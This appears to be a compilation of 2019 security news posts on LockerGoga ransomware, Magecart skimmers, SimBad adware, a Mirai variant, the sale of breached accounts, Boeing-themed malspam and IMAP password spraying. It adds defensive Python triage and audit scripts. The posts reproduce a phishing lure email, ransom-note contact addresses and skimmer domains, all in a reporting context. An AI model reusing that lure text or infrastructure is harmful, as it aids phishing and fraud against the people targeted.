SI-LAB observed this ransomware and noted that a sample submitted to VirusTotal at 2019-03-08 12:43:50 UTC was not classified as malicious.

Figure 1: LockerGoga ransomware not detected by VirusTotal.

This threat was also noted by MalwareHunterTeam, who mentioned the following in a tweet:

As shown, after a few hours some detections were already recorded in VirusTotal, which indicates this ransomware was probably detected through behavioral analysis by AV engines.

Figure 2: LockerGoga detections by VirusTotal.

At first glance this ransomware seems to be FUD (fully undetectable) malware. Let’s take a look.

Windows Defender does not detect LockerGoga

We ran the malware on a virtual machine with Windows 10 installed and no malicious activity was detected by the Microsoft antivirus on March 12th. Moreover, we performed a single scan with Windows Defender directly and no suspicious activity was flagged either.

Figure 3: LockerGoga not detected by Windows Defender.

As shown in Figure 4, no suspicious sections were noted, but some details need to be mentioned, namely:

  1. The ransomware is signed;
  2. It is packed;
  3. LockerGoga has associated mutex activities;
  4. It has anti-debug and anti-VM protections.

Figure 4: First LockerGoga fingerprint.

In detail, we can see that functions known to be used in anti-VM and anti-debug checks are called during its execution, such as GetLastError(), IsDebuggerPresent() and OutputDebugStringA().

Another important aspect is that the ransomware was built with Microsoft Visual C++ 8, a programming language widely used by threat actors and well suited to handling system calls at the lowest level.

The malware requires admin rights to run, so it uses the requireAdministrator execution level. When a standard user starts such a process, the over-the-shoulder UAC dialog is shown, which gives the user an opportunity to ask an admin to supply their credentials.

Figure 5: Admin right required when malware is executed.

Looking at the binary in IDA, we can see that LockerGoga uses AES-256 and RSA to encrypt all the targeted files on the victims’ devices.

Figure 6: Cryptographic functions used by LockerGoga.

SI-LAB also observed the ransomware will normally target DOC, DOT, WBK, DOCX, DOTX, DOCB, XLM, XLSX, XLTX, XLSB, XLW, PPT, POT, PPS, PPTX, POTX, PPSX, SLDX, and PDF files.

This ransomware is signed with a code-signing certificate issued by Sectigo (the Comodo Certificate Authority, acquired by Francisco Partners and known by its new brand name Sectigo).


Figure 7: This ransomware is signed by Sectigo, Comodo Certificate Authority.

Behavior Analysis

When the ransomware is executed with the ‘-w’ command line argument, it targets all file types. Other supported switches are ‘-k’ and ‘-m’, for Base64 encoding and for providing the email addresses to show in the ransom note.

Another interesting thing is that the ransomware sample launches itself with the -w argument and also spawns a new process for each file it encrypts, which makes the encryption process very slow.

Figure 8: Malware launches several copies of itself to encrypt targeted files.

The ransomware appends the .locked extension to encrypted files’ names. This means that a file named readme.txt would be encrypted and then renamed to readme.txt.locked.


Figure 8: Files encrypted by LockerGoga — .locked extension is appended.

After encryption, it will drop a ransom note named README-NOW.txt on the desktop, which includes instructions to contact the SuzuMcpherson@protonmail.com or AsuxidOruraep1999@o2.pl email addresses for payment instructions.


Figure 9: Ransom note dropped by the malware on the user’s desktop.

After a memory analysis, no RSA or AES keys were found that could be used to decrypt the targeted files. Nonetheless, there is good news for victims: the ransomware does not affect Windows shadow copies.
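As an added example (not SI-LAB’s or Security Affairs’ code), a post-incident triage script built around the behaviour described in this analysis: it inventories files carrying the .locked extension, recovers their original extensions, uses the default target list to infer whether the sample ran in -w (all files) mode, and locates README-NOW.txt ransom notes. The directory tree it scans is constructed for the demo.

```python
"""Post-incident triage for a LockerGoga-style encryption event.

Added example, not SI-LAB's or Security Affairs' code. It walks a directory
tree, collects the files carrying the ".locked" extension described in the
analysis, recovers each file's original extension, flags whether any hit
extension lies outside the default Office/PDF target list (a hint that the
sample ran in "-w" all-files mode), and locates README-NOW.txt ransom notes.
The sample tree it builds is constructed for the demo.
"""
import os
import tempfile
from collections import Counter

ENCRYPTED_EXT = ".locked"
RANSOM_NOTE = "README-NOW.txt"
# Default target list reported in the analysis, compared case-insensitively.
DEFAULT_TARGETS = {
    "doc", "dot", "wbk", "docx", "dotx", "docb", "xlm", "xlsx", "xltx",
    "xlsb", "xlw", "ppt", "pot", "pps", "pptx", "potx", "ppsx", "sldx", "pdf",
}


def original_extension(name):
    """Extension a file had before ".locked" was appended.

    "report.docx.locked" -> "docx"; "archive.locked" (no inner extension) -> "".
    """
    base = name[: -len(ENCRYPTED_EXT)]
    _, dot, ext = base.rpartition(".")
    return ext.lower() if dot else ""


def triage(root):
    """Summarise encrypted files and ransom notes found below `root`."""
    by_ext = Counter()
    notes = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name == RANSOM_NOTE:
                notes.append(os.path.join(dirpath, name))
            elif name.lower().endswith(ENCRYPTED_EXT):
                by_ext[original_extension(name)] += 1
    beyond = sorted(ext for ext in by_ext if ext not in DEFAULT_TARGETS)
    return {
        "encrypted_total": sum(by_ext.values()),
        "by_original_ext": dict(by_ext),
        # Anything outside the default list points at the "-w" switch.
        "beyond_default_targets": beyond,
        "likely_all_files_mode": bool(beyond),
        "ransom_notes": notes,
    }


def build_sample_tree(all_files_mode=False):
    """Create a constructed directory mimicking a partially encrypted host."""
    root = tempfile.mkdtemp(prefix="lockergoga_triage_")
    docs = os.path.join(root, "Documents")
    os.makedirs(docs)
    names = ["budget.xlsx.locked", "memo.docx.locked", "scan.pdf.locked", "notes.txt"]
    if all_files_mode:
        names += ["photo.jpg.locked", "notes.txt.locked"]
    for name in names:
        with open(os.path.join(docs, name), "wb") as fh:
            fh.write(b"constructed placeholder content")
    with open(os.path.join(root, RANSOM_NOTE), "w") as fh:
        fh.write("constructed ransom note placeholder\n")
    return root


if __name__ == "__main__":
    for mode in (False, True):
        label = "all-files mode" if mode else "default mode"
        print(label, triage(build_sample_tree(mode)))
```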

Final Notes

In the recent past, several variants of this ransomware have been observed. For that reason, it’s important for users and businesses to keep their antivirus fully updated with recent malware signatures.

SI-LAB has also made available a YARA rule that allows a more effective scan to detect threats of this nature.

Further technical details, including Indicators of Compromise (IoCs) and YARA rules, are reported in the analysis published by Pedro Tavares:

About the author Pedro Tavares:

Pedro Tavares is a professional in the field of information security working as an Ethical Hacker, Malware Analyst and also a Security Evangelist. He is also a founding member and Pentester at CSIRT.UBI and founder of the computer security blog segurancainformatica.pt.

Pierluigi Paganini

(SecurityAffairs – LockerGoga, ransomware)

The post [SI-LAB] LockerGoga is the most active ransomware that focuses on targeting companies appeared first on Security Affairs.


MyPillow and Amerisleep are the latest victims of Magecart gangs

Security experts at RiskIQ revealed today that another two organizations were victims of the Magecart crime gang, the bedding retailers MyPillow and Amerisleep.

Security experts at RiskIQ announced that the two bedding retailers MyPillow and Amerisleep were victims of the Magecart cybercrime gang.

The Magecart umbrella includes at least 11 different hacking crews that have been active since at least 2015. The gangs implant skimming scripts into compromised online stores to steal payment card data, but they are quite different from each other.

The list of victims of Magecart groups is long and includes several major platforms such as British Airways, Newegg, Ticketmaster, and Feedify.

Now RiskIQ has published a report that discloses two new credit-card breaches associated with Magecart threat actors. Hackers stole payment card data from the online bedding retailers MyPillow and Amerisleep by implanting digital skimming code on both websites. One of the incidents was resolved but never disclosed; the other is still ongoing.

“In this blog, we’ll document two Magecart-related breaches against bedding retailers MyPillow and Amerisleep.” reads the advisory published by RiskIQ. “One has been resolved but was never disclosed and another is ongoing despite numerous attempts by us to contact the affected retailer. In both cases, the potential victims of credit card fraud, the consumers, have not been informed.”

Magecart skimmer

The MyPillow website was compromised in October 2018. In this case, crooks inserted skimming code into the site that was hosted on a look-alike domain (mypiltow[.]com), a typosquat of MyPillow’s legitimate domain, using a certificate issued by Let’s Encrypt.

The skimming script remained on the website from October 1st to November 19th.

The second company hit by the Magecart gang is Amerisleep, which was targeted by the same crews multiple times in 2017. Another attack dates back to December 2018, when Magecart compromised the website by injecting skimmers hosted on a GitHub account.

The latest attack against Amerisleep was discovered in January, experts noticed that the skimming scripts were injected by the attackers only on payment pages.

“In December 2018, the attackers had used a new skimming setup with a fascinating new method. The attackers abused Github by registering a Github account called “amerisleep” and creating the Github Pages address amerisleep.github.io.” continues the post.

“This skimming method quickly disappeared.” “Starting in January, we observed a different skimmer that Magecart actors injected with some conditional checks to ensure the script would only go on payment pages. Formerly, the skimmers themselves would check to see if they were already on an active payment page.”

Experts noticed that the skimmer domain had been taken offline, but the injection was still live on the website as of the report’s publication.

“Magecart has capitalized on the fact that the security controls of small companies who provide services to enhance the websites of global brands are far less developed than the security controls of the global brands themselves.” concludes the report.

“Businesses need to focus on visibility into internet-facing attack surfaces and increase scrutiny of third-party services that form an integral part of modern web applications. The reputation of organizations that run payment forms online and the overall confidence of online shoppers is at stake.”
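One concrete form of the third-party script scrutiny the report asks for, as an added example that is not RiskIQ’s code: inventory the script sources on a checkout page, flag any host that is neither the shop nor allowlisted, and score unknown hosts for similarity to the shop’s own name so a one-letter typosquat like mypiltow[.]com stands out. The checkout HTML and the allowlisted CDN host are constructed for the demo.

```python
"""Inventory the script sources on a checkout page and flag look-alike hosts.

Added example, not RiskIQ's code. The MyPillow skimmer described above was
served from mypiltow[.]com, a typosquat of the retailer's real domain, and the
Amerisleep one from a GitHub Pages site named after the retailer. This check
parses a page's <script src> attributes, reports every host that is neither
the shop itself nor on an allowlist, and scores each unknown host for
similarity to the shop's own name so a one-letter near miss stands out. The
HTML below is constructed; the allowlisted CDN host is a placeholder.
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit

SAMPLE_CHECKOUT_HTML = """
<html><head>
<script src="/static/checkout.js"></script>
<script src="https://cdn.payments-provider.example/v1/form.js"></script>
<script src="https://mypiltow.com/assets/jquery.min.js"></script>
<script src="//amerisleep.github.io/lib/checkout.js"></script>
</head><body><form id="payment"></form></body></html>
"""


def levenshtein(a, b):
    """Edit distance; inputs are short, so the O(len(a)*len(b)) table is fine."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            src = dict(attrs).get("src")
            if src:
                self.sources.append(src)


def brand_label(host):
    """Label left of the TLD for the plain name.tld case ("www.mypillow.com" -> "mypillow")."""
    parts = host.lower().split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def audit_scripts(html, site_host, allowed_hosts, max_distance=2):
    """Return one finding per script host that is neither the site nor allowlisted."""
    collector = ScriptSrcCollector()
    collector.feed(html)
    findings = []
    for src in collector.sources:
        host = urlsplit(src).hostname
        if host is None:  # relative URL, served by the shop itself
            continue
        host = host.lower()
        if host == site_host.lower() or host in allowed_hosts:
            continue
        distance = levenshtein(brand_label(host), brand_label(site_host))
        findings.append({
            "src": src,
            "host": host,
            "distance": distance,
            # 0 < distance <= max_distance: resembles the brand but is not it.
            "lookalike": 0 < distance <= max_distance,
        })
    return findings


if __name__ == "__main__":
    for finding in audit_scripts(SAMPLE_CHECKOUT_HTML, "www.mypillow.com",
                                 {"cdn.payments-provider.example"}):
        print(finding)
```

Every unknown host is reported; the lookalike flag only orders the review queue, since the GitHub Pages skimmer in the same report carried the brand in its subdomain rather than in a misspelling.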

Pierluigi Paganini

(SecurityAffairs – Magecart, hacking)

The post MyPillow and Amerisleep are the latest victims of Magecart gangs appeared first on Security Affairs.

SimBad malware infected million Android users through Play Store

Security experts at Check Point uncovered a sophisticated malware campaign spreading the SimBad malicious code through the official Google Play Store.

Researchers at Check Point have uncovered a sophisticated malware campaign spreading the SimBad agent through the official Google Play Store. According to experts, more than 150 million users were already impacted.

SimBad hides inside the RXDrioder software development kit (SDK), an SDK used for advertising and monetization. Every application built with the tainted SDK includes the malicious code.

“The malware resides within the ‘RXDrioder’ Software Development Kit (SDK), which is provided by ‘addroider[.]com’ as an ad-related SDK. We believe the developers were scammed to use this malicious SDK, unaware of its content, leading to the fact that this campaign was not targeting a specific country or developed by the same developer.” reads the analysis published by the experts.

“The malware has been dubbed ‘SimBad’ due to the fact that a large portion of the infected applications are simulator games.”

The domain ‘addroider[.]com’ was registered via GoDaddy with its ownership masked by a privacy protection service; RiskIQ’s PassiveTotal shows that the domain expired 7 months ago. Visiting the domain returns a login page that resembles other malware control panels; the ‘Register’ and ‘Sign Up’ links are broken and simply redirect the user back to the login page.

The SimBad malware is also able to redirect Android users to compromised phishing websites and to download more malicious applications either from the Play Store or from a remote server.

Once an Android user downloads and installs an infected application, the SimBad malware registers itself for the ‘BOOT_COMPLETED’ and ‘USER_PRESENT’ intents. In this way the malware can act once the boot phase has completed and while the unsuspecting user is using the device.

Once installed, SimBad connects to the command and control (C&C) server and receives a command to execute. It removes its icon from the launcher, making it harder for the user to uninstall the malicious app; at the same time it starts to display background ads and opens a browser on a given URL to generate fraudulent revenue without raising suspicion.

“‘SimBad’ has capabilities that can be divided into three groups – Show Ads, Phishing, and Exposure to other applications. With the capability to open a given URL in a browser, the actor behind ‘SimBad’ can generate phishing pages for multiple platforms and open them in a browser, thus performing spear-phishing attacks on the user.” continues the expert.

“With the capability to open market applications, such as Google Play and 9Apps, with a specific keyword search or even a single application’s page, the actor can gain exposure for other threat actors and increase his profits. The actor can even take his malicious activities to the next level by installing a remote application from a designated server, thus allowing him to install new malware once it is required.”
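As an added example (not Check Point's code, nor anything from the SimBad report), the following Python script triages an Android manifest for the two persistence hooks described above, receivers registered for BOOT_COMPLETED and USER_PRESENT, and flags any such receiver that lives outside the app's own package, which is how a bundled ad SDK shows up. The manifest, package and component names are constructed for the example.

```python
"""Triage an Android manifest for the persistence hooks SimBad used.

Constructed example, not code from the page: it parses a manifest and
lists every broadcast receiver subscribed to BOOT_COMPLETED or
USER_PRESENT, checks for the permission the boot receiver needs, and
points out receivers declared in a package other than the app's own.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
NAME_ATTR = f"{{{ANDROID_NS}}}name"          # Clark notation for android:name

# The two intent actions the page says SimBad registers for.
WATCHED_ACTIONS = {
    "android.intent.action.BOOT_COMPLETED",
    "android.intent.action.USER_PRESENT",
}
BOOT_PERMISSION = "android.permission.RECEIVE_BOOT_COMPLETED"

# Constructed sample manifest: a simulator game bundling a third-party ad
# SDK whose receiver hooks both actions. All names here are placeholders.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.simgame">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <application android:label="Sim Game">
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <receiver android:name="com.example.adsdk.WakeReceiver" android:exported="true">
      <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
        <action android:name="android.intent.action.USER_PRESENT"/>
      </intent-filter>
    </receiver>
    <receiver android:name=".UpdateReceiver">
      <intent-filter>
        <action android:name="com.example.simgame.UPDATE"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""


def qualify(pkg: str, name: str) -> str:
    """Expand a relative component name (".Foo") to its fully qualified form."""
    return pkg + name if name.startswith(".") else name


def find_persistence_receivers(manifest_xml: str) -> dict:
    """Map each receiver class to the sorted list of watched actions it hooks."""
    root = ET.fromstring(manifest_xml)
    pkg = root.get("package", "")
    found = {}
    for receiver in root.iter("receiver"):
        actions = {a.get(NAME_ATTR) for a in receiver.iter("action")}
        hit = actions & WATCHED_ACTIONS
        if hit:
            found[qualify(pkg, receiver.get(NAME_ATTR, ""))] = sorted(hit)
    return found


def has_boot_permission(manifest_xml: str) -> bool:
    """A BOOT_COMPLETED receiver never fires without this permission."""
    root = ET.fromstring(manifest_xml)
    return any(p.get(NAME_ATTR) == BOOT_PERMISSION
               for p in root.iter("uses-permission"))


def triage(manifest_xml: str) -> dict:
    """Summarise the indicators; the boot hook plus its permission, declared by
    a class outside the app's package, is the pattern worth a closer look."""
    pkg = ET.fromstring(manifest_xml).get("package", "")
    receivers = find_persistence_receivers(manifest_xml)
    foreign = [r for r in receivers if not r.startswith(pkg + ".")]
    return {
        "receivers": receivers,
        "boot_permission": has_boot_permission(manifest_xml),
        "third_party_receivers": foreign,
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_MANIFEST).items():
        print(f"{key}: {value}")
```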


According to Check Point, most of the infected applications are simulator games, followed by photo editors and wallpaper applications. Below is the list of the top 10 apps infected with SimBad malware:

  1. Snow Heavy Excavator Simulator (10,000,000 downloads)
  2. Hoverboard Racing (5,000,000 downloads)
  3. Real Tractor Farming Simulator (5,000,000 downloads)
  4. Ambulance Rescue Driving (5,000,000 downloads)
  5. Heavy Mountain Bus Simulator 2018 (5,000,000 downloads)
  6. Fire Truck Emergency Driver (5,000,000 downloads)
  7. Farming Tractor Real Harvest Simulator (5,000,000 downloads)
  8. Car Parking Challenge (5,000,000 downloads)
  9. Speed Boat Jet Ski Racing (5,000,000 downloads)
  10. Water Surfing Car Stunt (5,000,000 downloads)

The full list of malware-infected apps is available here.

This is only the latest campaign to abuse the Google Play store; previously reported massive attacks involved the CopyCat and Gooligan malware.

Pierluigi Paganini

(SecurityAffairs – SimBad, Android)

The post SimBad malware infected millions of Android users through the Play Store appeared first on Security Affairs.


Cyber war is here, according to 87% of security professionals

A study from Venafi has concluded that the world is in the midst of a cyber war, with 72% of respondents believing nation-states have the right to ‘hack back’ cybercriminals. The

The post Cyber war is here, according to 87% of security professionals appeared first on The Cyber Security Place.

A new development shows a potential shift to using Mirai to target enterprises

PaloAlto Networks researchers discovered a new variant of the infamous Mirai botnet that is targeting IoT devices belonging to businesses.

Researchers at PaloAlto Networks spotted a new variant of the infamous Mirai botnet that is targeting IoT devices belonging to businesses.

Mirai malware first appeared in the wild in 2016 when the expert MalwareMustDie discovered it in massive attacks aimed at Internet of Things (IoT) devices.


Since the code of the Mirai botnet was leaked online, many variants have emerged in the threat landscape. Satori, Masuta, Wicked Mirai, JenX, Omni, and the OMG botnet are just the latest variants to appear online in 2018.

A variant discovered last year was leveraging an open-source project to target multiple architectures, including ARM, MIPS, PowerPC, and x86.

The new Mirai variant targets embedded devices (e.g. routers, network storage devices, NVRs, and IP cameras) and leverages various exploits to compromise them.

Experts observed attacks against WePresent WiPG-1000 Wireless Presentation systems and LG Supersign TVs, both families of devices intended for use within business environments.

“In particular, Unit 42 found this new variant targeting WePresent WiPG-1000 Wireless Presentation systems, and in LG Supersign TVs. Both these devices are intended for use by businesses. This development indicates to us a potential shift to using Mirai to target enterprises.” Palo Alto Networks notes.

“The previous instance where we observed the botnet targeting enterprise vulnerabilities was with the incorporation of exploits against Apache Struts and SonicWall,”

The malicious code was hosted at a compromised website in Colombia: an “Electronic security, integration and alarm monitoring” business.

Researchers discovered that the new Mirai variant uses a total of 27 exploits, 11 of which are new to the threat. The bot also carries a new set of credentials to use in its brute-force attacks.

The new malware implements the same encryption scheme characteristic of Mirai; it is also able to scan for vulnerable devices and launch HTTP flood DDoS attacks.

The samples analyzed by the experts fetched the same payload, hosted at the same IP that had been hosting some Gafgyt samples just a few days before, and those Gafgyt samples used the same names as the binaries fetched by the shell script.

“IoT/Linux botnets continue to expand their attack surface, either by the incorporation of multiple exploits targeting a plethora of devices, or by adding to the list of default credentials they brute force, or both,” Palo Alto Networks concludes. “In addition, targeting enterprise vulnerabilities allows them access to links with potentially larger bandwidth than consumer device links, affording them greater firepower for DDoS attacks.”

Further details, including IoCs, are reported in the analysis published by PaloAlto Networks.

Pierluigi Paganini

(SecurityAffairs – Mirai, IoT)

The post A new development shows a potential shift to using Mirai to target enterprises appeared first on Security Affairs.


Google took down 2.3 billion bad ads in 2018, including 58.8M phishing ads

Google recently shared details about its efforts against malicious advertising: the giant took down 2.3 billion bad ads last year.

Google revealed that it took down 2.3 billion bad ads in 2018, including 58.8 million phishing ads for violation of its policies.

Google introduced 31 new ads policies in 2018, aimed at protecting users from scams and other fraudulent activities (e.g. third-party tech support, ticket resellers, and cryptocurrency).

Some of the policies added by Google in 2018 include a ban on ads from for-profit bail bond providers, which were being used to take advantage of vulnerable communities.

“In all, we introduced 31 new ads policies in 2018 to address abuses in areas including third-party tech support, ticket resellers, cryptocurrency and local services such as garage door repairmen, bail bonds and addiction treatment facilities.” reads the press release published by Google.

“We took down 2.3 billion bad ads in 2018 for violations of both new and existing policies, including nearly 207,000 ads for ticket resellers, over 531,000 ads for bail bonds and approximately 58.8 million phishing ads. Overall, that’s more than six million bad ads, every day.”

Malicious ads that Google took down in 2018 include nearly 207,000 ads for ticket resellers and over 531,000 ads for bail bonds.

Google announced that next month it will launch a new policy manager in Google Ads that gives advertisers tips on avoiding common policy mistakes.

Google also revealed that, with the help of improved machine learning technology, it was able to identify the threat actors behind bad ads and terminated nearly one million bad advertiser accounts.

“When we take action at the account level, it helps to address the root cause of bad ads and better protect our users,” continues Google.

In 2017, Google launched new technology for more granular analysis of ads; one year later the company launched 330 detection classifiers to better detect “badness” at the page level (nearly three times the number of classifiers it launched in 2017).

“So while we terminated nearly 734,000 publishers and app developers from our ad network, and removed ads completely from nearly 1.5 million apps, we were also able to take more granular action by taking ads off of nearly 28 million pages” Google adds.

Last year, Google introduced a new policy specifically created for election ads in the U.S. ahead of the 2018 midterm elections. Aiming to prevent misinformation and fake news, the company verified nearly 143,000 election ads; similar tools are being launched ahead of elections in the EU and India.

Google removed ads from approximately 1.2 million pages, more than 22,000 apps, and nearly 15,000 sites last year.

Ads from almost 74,000 pages were removed for violating Google’s “dangerous or derogatory” content policy, and 190,000 ads were taken down for violating this policy.

In 2018, Google helped the FBI, along with the cyber-security firm White Ops, to take down a sophisticated ad fraud scheme called ‘3ve’ that allowed its operators to earn tens of millions of dollars. 3ve infected over 1.7 million computers to carry out advertising frauds.

Pierluigi Paganini

(SecurityAffairs – malicious ads, Google)

The post Google took down 2.3 billion bad ads in 2018, including 58.8M phishing ads appeared first on Security Affairs.




gnosticplayers offers 26 Million new accounts for sale on the Dark Web

The hacker gnosticplayers is offering the fourth batch of millions of records stolen from 6 new websites for sale on the dark web.

Gnosticplayers is back with the fourth round of hacked accounts offered for sale on the dark web.

In February, the hacker who goes online by the moniker Gnosticplayers disclosed the existence of some massive unreported data breaches in three rounds, offering the huge trove of data for sale for a limited period of time.

In the first round, the seller listed a batch of 620 million accounts coming from 16 breached websites, including Dubsmash, Armor Games, 500px, Whitepages, and ShareThis. A few days later, Gnosticplayers offered a new batch of 127 million records originating from eight companies.

The third round contained more than 92 million hacked users’ accounts from 8 new websites, including the GIF hosting platform Gfycat.

Now the hacker is offering the fourth batch of millions of records stolen from 6 new websites for sale on the dark web.


In an exclusive conversation with HACKREAD, Gnosticplayers claimed to be a Pakistani citizen and a hacktivist fighting to give his country a positive image.

Now the hacker contacted The Hacker News via email to announce the availability of the fourth batch of data he claimed to have obtained from dozens of popular websites.

The fourth round is available for sale on the DreamMarket marketplace; the stolen records belong to the following hacked websites:

  1. Youthmanual — Indonesian college and career platform — 1.12 million accounts
  2. GameSalad — Online learning platform — 1.5 million accounts
  3. Bukalapak — Online Shopping Site — 13 million accounts
  4. Lifebear — Japanese Online Notebook — 3.86 million accounts
  5. EstanteVirtual — Online Bookstore — 5.45 Million accounts
  6. Coubic — Appointment Scheduling — 1.5 million accounts

The hacker is offering for sale the above databases individually for 1.2431 Bitcoin (roughly $5,000).

It is not clear whether the administrators of the above websites are aware that their data is for sale on the black market; none of them has previously disclosed a data breach.

Users of the web services listed in the four rounds are recommended to change their passwords on those websites and any other service for which they use the same credentials.

Pierluigi Paganini

(SecurityAffairs – gnosticplayers, dark web)

The post gnosticplayers offers 26 Million new accounts for sale on the Dark Web appeared first on Security Affairs.


Experts uncovered a malspam campaign using Boeing 737 Max crashes

Experts at the 360 Threat Intelligence Center uncovered a new malspam campaign that leverages the tragic Boeing 737 Max crash to spread malware.

Crooks always try to exploit public attention on events that make the headlines. In recent days, two events captured the attention of the media: the New Zealand mosque shooting and the tragic crash of the Boeing 737 Max in Ethiopia.

In the wake of the New Zealand mosque shooting, US CISA is recommending users to remain vigilant on possible scams and malware attacks.

Now experts at the 360 Threat Intelligence Center have uncovered a new malspam campaign that leverages the tragic Boeing 737 Max crash to spread malware. Crooks used spam messages that pretend to carry leaked documents about possible future crashes of the Boeing 737 Max.

Crooks are using the #Boeing hashtag in their campaign; the spam messages were sent from the allegedly compromised email account @IsgecPresses (info@isgec.com).

Threat actors are using a JAR file as an attachment (e.g. MP4_142019.jar) that acts as a dropper for the Houdini H-WORM RAT; the spam emails have subject lines similar to “Fwd: Airlines plane crash Boeing 737 Max 8”.


These emails pretend to be from a private intelligence analyst who found a leaked document on the dark web. The document supposedly contains information about other airline companies that will be affected by similar crashes soon.

Below is the text of the email used by the crooks, as shared by BleepingComputer.

Greetings 

I believe you have heard about the latest crash Boeing 737 MAX 8 which happen on sunday 10 march 2019, All  passengers and crew were killed in the accident

Ethiopian Airlines Flight ET302 from Addis Ababa, Ethiopia, to Nairobi, Kenya, crashed shortly after takeoff 

The dead were of 35 different nationalities, including eight Americans.

On 29 October 2018, the Boeing 737 MAX 8 operating the route crashed into the Java Sea 12 minutes after takeoff.

All 189 passengers and crew were killed in the accident.

note: there was a leak information from Darkweb which listed all the airline companies that will go down soon.

kindly notify your love ones about the informations on these file.
 
Regards

Joshua Berlinger 
private inteligent analyst

If a user attempts to open the JAR file, it will be executed by Java on the computer. This attachment was originally thought to only install the Houdini H-worm Remote Access Trojan, but security researcher Racco42 analyzed the JAR file after noticing its anomalous size and, by running it through Any.Run, discovered that the malware was also installing the Adwind data-stealer Trojan.

Pierluigi Paganini

(SecurityAffairs – Boeing 737 Max, malspam)

The post Experts uncovered a malspam campaign using Boeing 737 Max crashes appeared first on Security Affairs.

Security Affairs: Experts uncovered a malspam campaign using Boeing 737 Max crashes

Experts at the 360 Threat Intelligence Center uncovered a new malspam campaign that leverages the tragic Boeing 737 Max crash to spread malware.

Crooks always attempt to exploit the attention of the people on the events that made the headlines. In the last days, two events captured the attention of the media, the New Zealand mosque shooting and the tragic crash of the Boeing 737 Max in Ethiopia,

In the wake of the New Zealand mosque shooting, US CISA is recommending users to remain vigilant on possible scams and malware attacks.

Now experts at the 360 Threat Intelligence Center have uncovered a new malspam campaign that leverages the tragic Boeing 737 Max crash to spread malware. Crooks used spam messages that pretend to be leaked documents about possible crashes of the Boeing 737 Max.

Crooks are using #Boeing hashtag in their campaign, spam messages were sent by the allegedly compromised email account at @IsgecPresses (info@isgec.com).

Threat actors are using a JAR file as an attachment (i.e. MP4_142019.jar) that acts as a dropper for the Houdini H-WORM RAT, spam emails have subject lines similar to “Fwd: Airlines plane crash Boeing 737 Max 8“.

spam boeing 737 max-

These emails pretend to be from a private intelligence analyst who found a leaked document on the dark web. This document pretends to contain information about other airline companies will be affected by similar crashes soon. 

Below the text used by crooks that was shared by BleepingComputer.

Greetings 

I believe you have heard about the latest crash Boeing 737 MAX 8 which happen on sunday 10 march 2019, All  passengers and crew were killed in the accident

Ethiopian Airlines Flight ET302 from Addis Ababa, Ethiopia, to Nairobi, Kenya, crashed shortly after takeoff 

The dead were of 35 different nationalities, including eight Americans.

On 29 October 2018, the Boeing 737 MAX 8 operating the route crashed into the Java Sea 12 minutes after takeoff.

All 189 passengers and crew were killed in the accident.

note: there was a leak information from Darkweb which listed all the airline companies that will go down soon.

kindly notify your love ones about the informations on these file.
 
Regards

Joshua Berlinger 
private inteligent analyst

If a user attempts to open the JAR file, it is executed by Java on the computer. The attachment was originally thought to install only the Houdini H-worm Remote Access Trojan, but security researcher Racco42 analyzed the JAR file after noticing its anomalous size and, running it through Any.Run, discovered that the malware also installs the Adwind data-stealer Trojan.

Pierluigi Paganini

(SecurityAffairs – Boeing 737 Max, malspam)

The post Experts uncovered a malspam campaign using Boeing 737 Max crashes appeared first on Security Affairs.



Security Affairs

Massive attacks bypass MFA on Office 365 and G Suite accounts via IMAP Protocol

Threat actors targeted Office 365 and G Suite cloud accounts using the IMAP protocol to bypass multi-factor authentication (MFA).

Over the past months, threat actors have targeted Office 365 and G Suite cloud accounts using the IMAP protocol to bypass multi-factor authentication (MFA).

Experts at Proofpoint conducted an interesting study of massive attacks against accounts of major cloud services. The experts noticed that attackers leverage legacy protocols and credential dumps to increase the efficiency of massive brute-force attacks.

“Attacks against Office 365 and G Suite cloud accounts using IMAP are difficult to protect against with multi-factor authentication, where service accounts and shared mailboxes are notably vulnerable.” reads the study published by Proofpoint. “At the same time, targeted, intelligent brute force attacks brought a new approach to traditional password-spraying, employing common variations of the usernames and passwords exposed in large credential dumps to compromise accounts.”

The experts analyzed over one hundred thousand unauthorized logins across millions of monitored cloud user accounts; below are the key findings from the study:

  • 72% of tenants were targeted at least once by threat actors  
  • 40% of tenants had at least one compromised account in their environment  
  • Over 2% of active user-accounts were targeted by malicious actors 
  • 15 out of every 10,000 active user-accounts were successfully breached by attackers 

The attacker’s primary goal is to carry out internal phishing, especially when the initial target does not have the access needed to transfer money or data. Access to a cloud account can be exploited by attackers for lateral movement and to expand footholds within an organization via internal phishing and internal BEC. Experts observed that compromised accounts are also used to launch external attacks.

Looking at the sources of the attacks, most of them come from Nigerian IP addresses (40%), followed by Chinese IP addresses (26%).

According to the study, IMAP was the most abused legacy protocol. IMAP relies on legacy authentication, which does not support an MFA challenge, so a valid password alone is enough to sign in and the second factor is never enforced. Experts pointed out that these attacks avoid account lock-out and appear as isolated failed logins, which makes them hard to detect.

Other data provided by the experts:

  • Approximately 60% of Microsoft Office 365 and G Suite tenants were targeted with IMAP-based password-spraying attacks 
  • Roughly 25% of Office 365 and G Suite tenants experienced a successful breach as a result 
  • Threat actors achieved a 44% success rate breaching an account at a targeted organization 

The experts observed a large number of IMAP-based password-spraying campaigns between September 2018 and February 2019. Proofpoint reported that 10% of active user accounts in targeted tenants were hit and 1% of targeted user accounts were successfully breached.
